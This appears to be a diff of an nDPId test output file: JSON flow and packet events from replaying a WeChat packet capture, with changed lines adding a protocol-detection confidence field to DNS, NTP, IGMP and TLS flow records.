 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"wechat.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":2,"flow_last_seen":1492171269750,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1492171269750,"pkt":"8IQvSpdgeJKcD6iOCABFAABEJttAAEARjxjAqAFnwKgB\/rE2ADUAMGKHk6IBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20AAAEAAQ=="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1492171270418,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1492171270418,"pkt":"8IQvSpdgeJKcD6iOCABFAAA9Ju1AAEARjw3AqAFnwKgB\/qZdADUAKRuahlUBAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQAAAQAB"}
-00741{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00767{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1661,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492171270418,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"ssl.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"wechat.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1492171273433,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1492171273433,"pkt":"8IQvSpdgeJKcD6iOCABFAABBJ9JAAEARjiTAqAFnwKgB\/qRaADUALSfRFz8BAAABAAAAAAAAA3NzbAdnc3RhdGljA2NvbQNsYW4AAAEAAQ=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"wechat.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1492171273759,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1492171273759,"pkt":"8IQvSpdgeJKcD6iOCABFAABIKB1AAEARjdLAqAFnwKgB\/qq5ADUANAzJFXEBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1492171274388,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1492171274388,"pkt":"8IQvSpdgeJKcD6iOCABFAABHKHpAAEARjXbAqAFnwKgB\/qdoADUAMwYVU1YBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwNsYW4AAAEAAQ=="}
-00748{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1666,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1492171274388,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"ts_msec":1492171274388,"pkt":"8IQvSpdgeJKcD6iOCABFAABHKHtAAEARjXXAqAFnwKgB\/qdoADUAMwU2OTUBAAABAAAAAAAAATEGZGViaWFuBHBvb2wDbnRwA29yZwNsYW4AABwAAQ=="}
-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1667,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1492171274388,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.debian.pool.ntp.org.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1492171274755,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1492171274755,"pkt":"8IQvSpdgeJKcD6iOCABFAABIKKBAAEARjU\/AqAFnwKgB\/q06ADUANGSfuxkBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1668,"source":"wechat.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171274755,"flow_last_seen":1492171274755,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171274755,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":44346,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00577{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171177429,"flow_last_seen":1492171177429,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":43317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00577{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171178741,"flow_last_seen":1492171183746,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":56367,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00577{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171184747,"flow_last_seen":1492171184747,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":33915,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1492171290232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMahAAEARhEzAqAFnwKgB\/qMfADUAL3l8SRkBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAAQAB"}
-00744{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1669,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAABDMalAAEARhEvAqAFnwKgB\/qMfADUAL1ZyUSMBAAABAAAAAAAAATIGZGViaWFuBHBvb2wDbnRwA29yZwAAHAAB"}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1670,"source":"wechat.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171290232,"flow_last_seen":1492171290232,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1492171290232,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":41759,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.debian.pool.ntp.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"wechat.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1492171290232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1492171290232,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0Mx1AAEAGXPLAqAFnQOmnvNO9AbuA1BLzAh8CfoAQAT2IFAAAAQEICgA\/vqCGKY\/Q"}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1492171291761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1492171291761,"pkt":"8IQvSpdgeJKcD6iOCABFAABIMrNAAEARgzzAqAFnwKgB\/tELADUANPxl\/4EBAAABAAAAAAAAB3dlYnB1c2gDd2ViBndlY2hhdANjb20DbGFuAAABAAE="}
-00749{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171291761,"flow_last_seen":1492171291761,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53515,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"webpush.web.wechat.com.lan","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492171270418,"flow_last_seen":1492171270418,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42589,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492171250302,"flow_last_seen":1492171253304,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492171175912,"flow_last_seen":1492171268600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":440,"flow_tot_l4_payload_len":880,"flow_avg_l4_payload_len":293,"midstream":1,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.131","src_port":58143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171169377,"flow_last_seen":1492171169377,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"193.204.114.233","src_port":37578,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492171274388,"flow_last_seen":1492171274388,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":42856,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1492171211383,"flow_last_seen":1492171211383,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.108","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1672,"source":"wechat.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1492171206877,"flow_last_seen":1492171210973,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1492171291761,"l3_proto":"ip4","src_ip":"192.168.1.100","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
